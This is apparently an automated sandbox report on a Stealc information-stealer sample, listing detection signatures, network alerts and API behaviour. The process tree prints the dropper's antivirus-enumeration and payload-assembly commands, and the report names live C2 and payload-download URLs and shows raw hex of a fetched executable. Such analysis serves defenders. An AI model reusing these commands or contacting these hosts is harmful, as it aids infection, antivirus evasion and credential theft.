Edit tour

Windows Analysis Report
M13W1o3scc.exe

Overview

General Information

Sample name:	M13W1o3scc.exe renamed because original name is a hash value
Original sample name:	e6dd6a25125edd4c21fe5cf7bafcd2bb.exe
Analysis ID:	1528594
MD5:	e6dd6a25125edd4c21fe5cf7bafcd2bb
SHA1:	c1b1ec6b5e78fcaff4290bff55ae86ee8816f715
SHA256:	523cd90154c376b7f6953f1e825eb467b231b3fffe30ab321c1a69da22cb1148
Tags:	exeStealcuser-abuse_ch
Infos:

Detection

Stealc

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Antivirus detection for dropped file

Detected unpacking (changes PE section rights)

Detected unpacking (overwrites its own PE header)

Found malware configuration

Malicious sample detected (through community Yara rule)

Multi AV Scanner detection for domain / URL

Multi AV Scanner detection for dropped file

Multi AV Scanner detection for submitted file

Sigma detected: Search for Antivirus process

Suricata IDS alerts for network traffic

Yara detected Powershell download and execute

Yara detected Stealc

AI detected suspicious sample

C2 URLs / IPs found in malware configuration

Drops PE files with a suspicious file extension

Found evasive API chain (may stop execution after checking locale)

Injects a PE file into a foreign processes

Machine Learning detection for dropped file

Searches for specific processes (likely to inject)

AV process strings found (often used to terminate AV products)

Contains functionality for read data from the clipboard

Contains functionality to block mouse and keyboard input (often used to hinder debugging)

Contains functionality to check if a debugger is running (IsDebuggerPresent)

Contains functionality to check if a debugger is running (OutputDebugString,GetLastError)

Contains functionality to check if a window is minimized (may be used to check if an application is visible)

Contains functionality to communicate with device drivers

Contains functionality to create guard pages, often used to hinder reverse engineering and debugging

Contains functionality to dynamically determine API calls

Contains functionality to execute programs as a different user

Contains functionality to launch a process as a different user

Contains functionality to launch a program with higher privileges

Contains functionality to modify clipboard data

Contains functionality to open a port and listen for incoming connection (possibly a backdoor)

Contains functionality to query CPU information (cpuid)

Contains functionality to query locales information (e.g. system language)

Contains functionality to read the PEB

Contains functionality to read the clipboard data

Contains functionality to retrieve information about pressed keystrokes

Contains functionality to shutdown / reboot the system

Contains functionality to simulate keystroke presses

Contains functionality to simulate mouse events

Contains functionality which may be used to detect a debugger (GetProcessHeap)

Creates a process in suspended mode (likely to inject code)

Creates files inside the system directory

Detected potential crypto function

Downloads executable code via HTTP

Dropped file seen in connection with other malware

Drops PE files

Enables debug privileges

Extensive use of GetProcAddress (often used to hide API calls)

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

Found evaded block containing many API calls

Found evasive API chain (date check)

Found large amount of non-executed APIs

Found potential string decryption / allocating functions

HTTP GET or POST without a user agent

IP address seen in connection with other malware

Internet Provider seen in connection with other malware

JA3 SSL client fingerprint seen in connection with other malware

May sleep (evasive loops) to hinder dynamic analysis

OS version to string mapping found (often used in BOTs)

One or more processes crash

PE file contains sections with non-standard names

Potential key logger detected (key state polling based)

Queries the volume information (name, serial number etc) of a device

Sample execution stops while process was sleeping (likely an evasion)

Sample file is different than original file name gathered from version info

Sigma detected: Execution of Suspicious File Type Extension

Suricata IDS alerts with low severity for network traffic

Uses 32bit PE files

Uses Microsoft's Enhanced Cryptographic Provider

Uses code obfuscation techniques (call, push, ret)

Yara signature match

Classification

Process Tree

System is w10x64

M13W1o3scc.exe (PID: 7328 cmdline: "C:\Users\user\Desktop\M13W1o3scc.exe" MD5: E6DD6A25125EDD4C21FE5CF7BAFCD2BB)

cmd.exe (PID: 7376 cmdline: "C:\Windows\System32\cmd.exe" /c move Halo Halo.bat & Halo.bat MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)

conhost.exe (PID: 7384 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

tasklist.exe (PID: 7464 cmdline: tasklist MD5: 0A4448B31CE7F83CB7691A2657F330F1)

findstr.exe (PID: 7476 cmdline: findstr /I "wrsa opssvc" MD5: F1D4BE0E99EC734376FDE474A8D4EA3E)

tasklist.exe (PID: 7508 cmdline: tasklist MD5: 0A4448B31CE7F83CB7691A2657F330F1)

findstr.exe (PID: 7516 cmdline: findstr -I "avastui avgui bdservicehost nswscsvc sophoshealth" MD5: F1D4BE0E99EC734376FDE474A8D4EA3E)

cmd.exe (PID: 7552 cmdline: cmd /c md 773416 MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)

findstr.exe (PID: 7568 cmdline: findstr /V "MineralAlertSignificantVanilla" Partition MD5: F1D4BE0E99EC734376FDE474A8D4EA3E)

cmd.exe (PID: 7584 cmdline: cmd /c copy /b ..\Transmit + ..\Turtle + ..\Vienna + ..\Diet + ..\Enclosure + ..\Bangladesh + ..\Mobility + ..\Cool + ..\Completely A MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)

Welding.pif (PID: 7600 cmdline: Welding.pif A MD5: 18CE19B57F43CE0A5AF149C96AECC685)

Welding.pif (PID: 7964 cmdline: C:\Users\user\AppData\Local\Temp\773416\Welding.pif MD5: 18CE19B57F43CE0A5AF149C96AECC685)

478F.tmp.exe (PID: 8096 cmdline: "C:\Users\user\AppData\Local\Temp\478F.tmp.exe" MD5: E35C6AD41081DDCDA2BA9C65B5B1A6F8)

WerFault.exe (PID: 3612 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 8096 -s 1048 MD5: C31336C1EFC2CCB44B4326EA793040F2)

choice.exe (PID: 7616 cmdline: choice /d y /t 5 MD5: FCE0E41C87DC4ABBE976998AD26C27E4)

cleanup

Malware Threat Intel

Provided by

Name	Description	Attribution	Blogpost URLs	Link
Stealc	Stealc is an information stealer advertised by its presumed developer Plymouth on Russian-speaking underground forums and sold as a Malware-as-a-Service since January 9, 2023. According to Plymouth's statement, stealc is a non-resident stealer with flexible data collection settings and its development is relied on other prominent stealers: Vidar, Raccoon, Mars and Redline.Stealc is written in C and uses WinAPI functions. It mainly targets date from web browsers, extensions and Desktop application of cryptocurrency wallets, and from other applications (messengers, email clients, etc.). The malware downloads 7 legitimate third-party DLLs to collect sensitive data from web browsers, including sqlite3.dll, nss3.dll, vcruntime140.dll, mozglue.dll, freebl3.dll, softokn3.dll and msvcp140.dll. It then exfiltrates the collected information file by file to its C2 server using HTTP POST requests.	No Attribution	https://any.run/cybersecurity-blog/crackedcantil-breakdown/ https://blog.sekoia.io/stealc-a-copycat-of-vidar-and-raccoon-infostealers-gaining-in-popularity-part-1/ https://blog.sekoia.io/stealc-a-copycat-of-vidar-and-raccoon-infostealers-gaining-in-popularity-part-2/ https://cocomelonc.github.io/book/2023/12/13/malwild-book.html https://g0njxa.medium.com/approaching-stealers-devs-a-brief-interview-with-stealc-cbe5c94b84af	https://malpedia.caad.fkie.fraunhofer.de/details/win.stealc

Malware Configuration

Threatname: StealC

{"C2 url": "http://62.204.41.150/edd20096ecef326d.php", "Botnet": "default6_cap"}

Yara Signatures

PCAP (Network Traffic)

Source	Rule	Description	Author	Strings
dump.pcap	JoeSecurity_Stealc_1	Yara detected Stealc	Joe Security

Memory Dumps

Source	Rule	Description	Author	Strings
00000010.00000002.2258896880.000000000080D000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_Stealc	Yara detected Stealc	Joe Security
00000010.00000002.2258864711.00000000007E1000.00000040.00000020.00020000.00000000.sdmp	Windows_Trojan_RedLineStealer_ed346e4c	unknown	unknown	0x23e4:$a: 55 8B EC 8B 45 14 56 57 8B 7D 08 33 F6 89 47 0C 39 75 10 76 15 8B
00000010.00000002.2259075839.00000000022A0000.00000040.00001000.00020000.00000000.sdmp	JoeSecurity_Stealc	Yara detected Stealc	Joe Security
00000010.00000002.2259075839.00000000022A0000.00000040.00001000.00020000.00000000.sdmp	Windows_Trojan_Smokeloader_3687686f	unknown	unknown	0x30d:$a: 0C 8B 45 F0 89 45 C8 8B 45 C8 8B 40 3C 8B 4D F0 8D 44 01 04 89
00000010.00000003.2122750294.00000000022F0000.00000004.00001000.00020000.00000000.sdmp	JoeSecurity_Stealc	Yara detected Stealc	Joe Security
00000010.00000002.2258545852.0000000000400000.00000040.00000001.01000000.00000009.sdmp	JoeSecurity_Stealc	Yara detected Stealc	Joe Security
Process Memory Space: 478F.tmp.exe PID: 8096	JoeSecurity_PowershellDownloadAndExecute	Yara detected Powershell download and execute	Joe Security
Process Memory Space: 478F.tmp.exe PID: 8096	JoeSecurity_Stealc	Yara detected Stealc	Joe Security
Click to see the 3 entries

Unpacked PEs

Source	Rule	Description	Author
16.2.478F.tmp.exe.400000.1.raw.unpack	JoeSecurity_Stealc	Yara detected Stealc	Joe Security
16.2.478F.tmp.exe.22a0e67.2.unpack	JoeSecurity_Stealc	Yara detected Stealc	Joe Security
16.3.478F.tmp.exe.22f0000.1.unpack	JoeSecurity_Stealc	Yara detected Stealc	Joe Security
16.3.478F.tmp.exe.22f0000.1.raw.unpack	JoeSecurity_Stealc	Yara detected Stealc	Joe Security
16.2.478F.tmp.exe.22a0e67.2.raw.unpack	JoeSecurity_Stealc	Yara detected Stealc	Joe Security
16.2.478F.tmp.exe.400000.1.unpack	JoeSecurity_Stealc	Yara detected Stealc	Joe Security
Click to see the 1 entries

Sigma Signatures

System Summary

Sigma detected: Execution of Suspicious File Type Extension

Source: Process started

Author: Max Altgelt (Nextron Systems): Data: Command: Welding.pif A, CommandLine: Welding.pif A, CommandLine|base64offset|contains: , Image: C:\Users\user\AppData\Local\Temp\773416\Welding.pif, NewProcessName: C:\Users\user\AppData\Local\Temp\773416\Welding.pif, OriginalFileName: C:\Users\user\AppData\Local\Temp\773416\Welding.pif, ParentCommandLine: "C:\Windows\System32\cmd.exe" /c move Halo Halo.bat & Halo.bat, ParentImage: C:\Windows\SysWOW64\cmd.exe, ParentProcessId: 7376, ParentProcessName: cmd.exe, ProcessCommandLine: Welding.pif A, ProcessId: 7600, ProcessName: Welding.pif

HIPS / PFW / Operating System Protection Evasion

Sigma detected: Search for Antivirus process

Source: Process started

Author: Joe Security: Data: Command: findstr -I "avastui avgui bdservicehost nswscsvc sophoshealth" , CommandLine: findstr -I "avastui avgui bdservicehost nswscsvc sophoshealth" , CommandLine|base64offset|contains: ~), Image: C:\Windows\SysWOW64\findstr.exe, NewProcessName: C:\Windows\SysWOW64\findstr.exe, OriginalFileName: C:\Windows\SysWOW64\findstr.exe, ParentCommandLine: "C:\Windows\System32\cmd.exe" /c move Halo Halo.bat & Halo.bat, ParentImage: C:\Windows\SysWOW64\cmd.exe, ParentProcessId: 7376, ParentProcessName: cmd.exe, ProcessCommandLine: findstr -I "avastui avgui bdservicehost nswscsvc sophoshealth" , ProcessId: 7516, ProcessName: findstr.exe

Suricata Signatures

ET MALWARE [SEKOIA.IO] Win32/Stealc C2 Check-in

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-10-08T03:52:47.570397+0200	2044243	1	Malware Command and Control Activity Detected	192.168.2.4	60062	62.204.41.150	80	TCP

ETPRO MALWARE Common Downloader Header Pattern UH

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-10-08T03:52:43.269522+0200	2803274	2	Potentially Bad Traffic	192.168.2.4	60060	172.67.179.207	443	TCP
2024-10-08T03:52:44.114430+0200	2803274	2	Potentially Bad Traffic	192.168.2.4	60061	176.113.115.37	80	TCP

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

Antivirus detection for dropped file

Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\ScreenUpdateSync[1].exe	Avira: detection malicious, Label: HEUR/AGEN.1310247
Source: C:\Users\user\AppData\Local\Temp\478F.tmp.exe	Avira: detection malicious, Label: HEUR/AGEN.1310247

Found malware configuration

Source: 00000010.00000003.2122750294.00000000022F0000.00000004.00001000.00020000.00000000.sdmp

Malware Configuration Extractor: StealC {"C2 url": "http://62.204.41.150/edd20096ecef326d.php", "Botnet": "default6_cap"}

Multi AV Scanner detection for domain / URL

Source: http://62.204.41.151/ScreenUpdateSync.exe	Virustotal: Detection: 19%	Perma Link
Source: http://62.204.41.150/ows	Virustotal: Detection: 6%	Perma Link
Source: http://62.204.41.150	Virustotal: Detection: 9%	Perma Link
Source: http://62.204.41.151/ScreenUpdateSync.exegyaCannot	Virustotal: Detection: 17%	Perma Link
Source: http://62.204.41.150/edd20096ecef326d.php	Virustotal: Detection: 12%	Perma Link
Source: http://62.204.41.150/	Virustotal: Detection: 9%	Perma Link

Multi AV Scanner detection for dropped file

Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\ScreenUpdateSync[1].exe	ReversingLabs: Detection: 28%
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\ScreenUpdateSync[1].exe	Virustotal: Detection: 37%	Perma Link
Source: C:\Users\user\AppData\Local\Temp\478F.tmp.exe	ReversingLabs: Detection: 28%
Source: C:\Users\user\AppData\Local\Temp\478F.tmp.exe	Virustotal: Detection: 37%	Perma Link
Source: C:\Users\user\AppData\Local\Temp\773416\Welding.pif	Virustotal: Detection: 11%	Perma Link

Multi AV Scanner detection for submitted file

Source: M13W1o3scc.exe

Virustotal: Detection: 11%

Perma Link

AI detected suspicious sample

Source: Submited Sample

Integrated Neural Analysis Model: Matched 100.0% probability

Machine Learning detection for dropped file

Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\ScreenUpdateSync[1].exe	Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\478F.tmp.exe	Joe Sandbox ML: detected

Source: C:\Users\user\AppData\Local\Temp\478F.tmp.exe	Code function: 16_2_0040C820 memset,lstrlenA,CryptStringToBinaryA,memcpy,lstrcatA,lstrcatA,lstrcatA,	16_2_0040C820
Source: C:\Users\user\AppData\Local\Temp\478F.tmp.exe	Code function: 16_2_00407240 GetProcessHeap,HeapAlloc,CryptUnprotectData,WideCharToMultiByte,LocalFree,	16_2_00407240
Source: C:\Users\user\AppData\Local\Temp\478F.tmp.exe	Code function: 16_2_00409AC0 CryptStringToBinaryA,LocalAlloc,CryptStringToBinaryA,LocalFree,	16_2_00409AC0
Source: C:\Users\user\AppData\Local\Temp\478F.tmp.exe	Code function: 16_2_00418EA0 CryptBinaryToStringA,GetProcessHeap,HeapAlloc,CryptBinaryToStringA,	16_2_00418EA0
Source: C:\Users\user\AppData\Local\Temp\478F.tmp.exe	Code function: 16_2_00409B60 CryptUnprotectData,LocalAlloc,memcpy,LocalFree,	16_2_00409B60
Source: C:\Users\user\AppData\Local\Temp\478F.tmp.exe	Code function: 16_2_022ACA87 memset,lstrlen,CryptStringToBinaryA,memcpy,lstrcat,lstrcat,lstrcat,	16_2_022ACA87
Source: C:\Users\user\AppData\Local\Temp\478F.tmp.exe	Code function: 16_2_022A74A7 GetProcessHeap,RtlAllocateHeap,CryptUnprotectData,WideCharToMultiByte,LocalFree,	16_2_022A74A7
Source: C:\Users\user\AppData\Local\Temp\478F.tmp.exe	Code function: 16_2_022A9D27 CryptStringToBinaryA,LocalAlloc,CryptStringToBinaryA,LocalFree,	16_2_022A9D27
Source: C:\Users\user\AppData\Local\Temp\478F.tmp.exe	Code function: 16_2_022B9107 CryptBinaryToStringA,GetProcessHeap,RtlAllocateHeap,CryptBinaryToStringA,	16_2_022B9107
Source: C:\Users\user\AppData\Local\Temp\478F.tmp.exe	Code function: 16_2_022A9DC7 CryptUnprotectData,LocalAlloc,memcpy,LocalFree,	16_2_022A9DC7

Compliance

Detected unpacking (overwrites its own PE header)

Source: C:\Users\user\AppData\Local\Temp\478F.tmp.exe

Unpacked PE file: 16.2.478F.tmp.exe.400000.1.unpack

Source: M13W1o3scc.exe

Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE

Source: C:\Users\user\AppData\Local\Temp\478F.tmp.exe

File opened: C:\Windows\SysWOW64\msvcr100.dll

Jump to behavior

Source: unknown

HTTPS traffic detected: 172.67.179.207:443 -> 192.168.2.4:60060 version: TLS 1.2

Source: M13W1o3scc.exe

Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

Source: C:\Users\user\Desktop\M13W1o3scc.exe	Code function: 0_2_004062D5 FindFirstFileW,FindClose,	0_2_004062D5
Source: C:\Users\user\Desktop\M13W1o3scc.exe	Code function: 0_2_00402E18 FindFirstFileW,	0_2_00402E18
Source: C:\Users\user\Desktop\M13W1o3scc.exe	Code function: 0_2_00406C9B DeleteFileW,lstrcatW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,RemoveDirectoryW,	0_2_00406C9B
Source: C:\Users\user\AppData\Local\Temp\773416\Welding.pif	Code function: 15_2_00114005 FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,	15_2_00114005
Source: C:\Users\user\AppData\Local\Temp\773416\Welding.pif	Code function: 15_2_000BE26E Process32NextW,SetFileTime,GetFileAttributesW,FindFirstFileW,__floor_pentium4,GetShortPathNameW,DeleteFileW,__floor_pentium4,	15_2_000BE26E
Source: C:\Users\user\AppData\Local\Temp\773416\Welding.pif	Code function: 15_2_0011C2FF FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,	15_2_0011C2FF
Source: C:\Users\user\AppData\Local\Temp\773416\Welding.pif	Code function: 15_2_0011494A GetFileAttributesW,FindFirstFileW,FindClose,	15_2_0011494A
Source: C:\Users\user\AppData\Local\Temp\773416\Welding.pif	Code function: 15_2_0011CD14 FindFirstFileW,FindClose,	15_2_0011CD14
Source: C:\Users\user\AppData\Local\Temp\773416\Welding.pif	Code function: 15_2_0011CD9F FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,	15_2_0011CD9F
Source: C:\Users\user\AppData\Local\Temp\773416\Welding.pif	Code function: 15_2_0011F5D8 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,	15_2_0011F5D8
Source: C:\Users\user\AppData\Local\Temp\773416\Welding.pif	Code function: 15_2_0011F735 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,	15_2_0011F735
Source: C:\Users\user\AppData\Local\Temp\773416\Welding.pif	Code function: 15_2_0011FA36 FindFirstFileW,Sleep,_wcscmp,_wcscmp,FindNextFileW,FindClose,	15_2_0011FA36
Source: C:\Users\user\AppData\Local\Temp\773416\Welding.pif	Code function: 15_2_00113CE2 FindFirstFileW,DeleteFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,	15_2_00113CE2
Source: C:\Users\user\AppData\Local\Temp\478F.tmp.exe	Code function: 16_2_0040E430 FindFirstFileA,StrCmpCA,StrCmpCA,FindNextFileA,	16_2_0040E430
Source: C:\Users\user\AppData\Local\Temp\478F.tmp.exe	Code function: 16_2_004138B0 wsprintfA,FindFirstFileA,lstrcatA,StrCmpCA,StrCmpCA,wsprintfA,PathMatchSpecA,CoInitialize,CoUninitialize,lstrcatA,lstrlenA,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,wsprintfA,CopyFileA,__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z,DeleteFileA,FindNextFileA,FindClose,	16_2_004138B0
Source: C:\Users\user\AppData\Local\Temp\478F.tmp.exe	Code function: 16_2_00414570 GetProcessHeap,HeapAlloc,wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,lstrcatA,lstrcatA,lstrlenA,lstrlenA,	16_2_00414570
Source: C:\Users\user\AppData\Local\Temp\478F.tmp.exe	Code function: 16_2_00414910 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,	16_2_00414910
Source: C:\Users\user\AppData\Local\Temp\478F.tmp.exe	Code function: 16_2_0040ED20 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrlenA,DeleteFileA,CopyFileA,FindNextFileA,FindClose,	16_2_0040ED20
Source: C:\Users\user\AppData\Local\Temp\478F.tmp.exe	Code function: 16_2_0040BE70 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,StrCmpCA,DeleteFileA,StrCmpCA,FindNextFileA,FindClose,	16_2_0040BE70
Source: C:\Users\user\AppData\Local\Temp\478F.tmp.exe	Code function: 16_2_0040DE10 FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,	16_2_0040DE10
Source: C:\Users\user\AppData\Local\Temp\478F.tmp.exe	Code function: 16_2_004016D0 FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,	16_2_004016D0
Source: C:\Users\user\AppData\Local\Temp\478F.tmp.exe	Code function: 16_2_0040DA80 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,FindNextFileA,FindClose,	16_2_0040DA80
Source: C:\Users\user\AppData\Local\Temp\478F.tmp.exe	Code function: 16_2_00413EA0 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,FindNextFileA,FindClose,	16_2_00413EA0
Source: C:\Users\user\AppData\Local\Temp\478F.tmp.exe	Code function: 16_2_0040F6B0 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,	16_2_0040F6B0
Source: C:\Users\user\AppData\Local\Temp\478F.tmp.exe	Code function: 16_2_022AE697 FindFirstFileA,StrCmpCA,StrCmpCA,FindNextFileA,	16_2_022AE697
Source: C:\Users\user\AppData\Local\Temp\478F.tmp.exe	Code function: 16_2_022B3B17 wsprintfA,FindFirstFileA,lstrcat,StrCmpCA,StrCmpCA,wsprintfA,PathMatchSpecA,CoInitialize,CoUninitialize,lstrcat,lstrlen,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,wsprintfA,CopyFileA,__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z,DeleteFileA,FindNextFileA,FindClose,	16_2_022B3B17
Source: C:\Users\user\AppData\Local\Temp\478F.tmp.exe	Code function: 16_2_022B4B77 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,CopyFileA,DeleteFileA,FindNextFileA,FindClose,	16_2_022B4B77
Source: C:\Users\user\AppData\Local\Temp\478F.tmp.exe	Code function: 16_2_022AEF87 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrlen,DeleteFileA,CopyFileA,FindNextFileA,FindClose,	16_2_022AEF87
Source: C:\Users\user\AppData\Local\Temp\478F.tmp.exe	Code function: 16_2_022B47D7 GetProcessHeap,RtlAllocateHeap,wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,lstrcat,lstrcat,lstrlen,lstrlen,	16_2_022B47D7
Source: C:\Users\user\AppData\Local\Temp\478F.tmp.exe	Code function: 16_2_022AE077 FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,	16_2_022AE077
Source: C:\Users\user\AppData\Local\Temp\478F.tmp.exe	Code function: 16_2_022ADCE7 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,FindNextFileA,FindClose,	16_2_022ADCE7
Source: C:\Users\user\AppData\Local\Temp\478F.tmp.exe	Code function: 16_2_022AC0D7 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,StrCmpCA,DeleteFileA,StrCmpCA,FindNextFileA,FindClose,	16_2_022AC0D7
Source: C:\Users\user\AppData\Local\Temp\478F.tmp.exe	Code function: 16_2_022A1937 FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,	16_2_022A1937
Source: C:\Users\user\AppData\Local\Temp\478F.tmp.exe	Code function: 16_2_022B4107 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,FindNextFileA,FindClose,	16_2_022B4107
Source: C:\Users\user\AppData\Local\Temp\478F.tmp.exe	Code function: 16_2_022AF917 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,	16_2_022AF917

Source: C:\Windows\SysWOW64\cmd.exe	File opened: C:\Users\user\AppData\Local\Temp\773416\	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	File opened: C:\Users\user\AppData\Local\Temp\	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	File opened: C:\Users\user\AppData\Local\	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	File opened: C:\Users\user\AppData\Local\Temp\773416	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	File opened: C:\Users\user\AppData\	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	File opened: C:\Users\user\	Jump to behavior

Networking

Suricata IDS alerts for network traffic

Source: Network traffic

Suricata IDS: 2044243 - Severity 1 - ET MALWARE [SEKOIA.IO] Win32/Stealc C2 Check-in : 192.168.2.4:60062 -> 62.204.41.150:80

C2 URLs / IPs found in malware configuration

Source: Malware configuration extractor

URLs: http://62.204.41.150/edd20096ecef326d.php

Source: global traffic

HTTP traffic detected: HTTP/1.1 200 OKDate: Tue, 08 Oct 2024 01:52:44 GMTServer: Apache/2.4.41 (Ubuntu)Last-Modified: Tue, 08 Oct 2024 01:45:01 GMTETag: "6ee00-623ed4925df50"Accept-Ranges: bytesContent-Length: 454144Content-Type: application/x-msdos-programData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e0 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 fb 69 6f f7 bf 08 01 a4 bf 08 01 a4 bf 08 01 a4 d0 7e 9f a4 a7 08 01 a4 d0 7e aa a4 98 08 01 a4 d0 7e ab a4 d3 08 01 a4 b6 70 92 a4 b4 08 01 a4 bf 08 00 a4 33 08 01 a4 d0 7e ae a4 be 08 01 a4 d0 7e 9b a4 be 08 01 a4 d0 7e 9c a4 be 08 01 a4 52 69 63 68 bf 08 01 a4 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 07 00 50 23 a0 65 00 00 00 00 00 00 00 00 e0 00 03 01 0b 01 0a 00 00 d6 00 00 00 f4 06 00 00 00 00 00 f9 3b 00 00 00 10 00 00 00 f0 00 00 00 00 40 00 00 10 00 00 00 02 00 00 05 00 01 00 00 00 00 00 05 00 01 00 00 00 00 00 00 10 26 00 00 04 00 00 a5 ff 06 00 02 00 00 80 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 40 9b 04 00 78 00 00 00 00 00 06 00 08 f1 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 b8 9b 04 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c8 90 04 00 40 00 00 00 00 00 00 00 00 00 00 00 00 f0 00 00 fc 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 dd d4 00 00 00 10 00 00 00 d6 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 d2 b6 03 00 00 f0 00 00 00 b8 03 00 00 da 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 c0 1c 01 00 00 b0 04 00 00 60 00 00 00 92 04 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 6a 6f 7a 69 7a 75 64 00 04 00 00 00 d0 05 00 00 04 00 00 00 f2 04 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 61 78 75 70 00 00 d6 00 00 00 00 e0 05 00 00 02 00 00 00 f6 04 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 6d 61 77 65 62 00 00 00 04 00 00 00 f0 05 00 00 04 00 00 00 f8 04 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 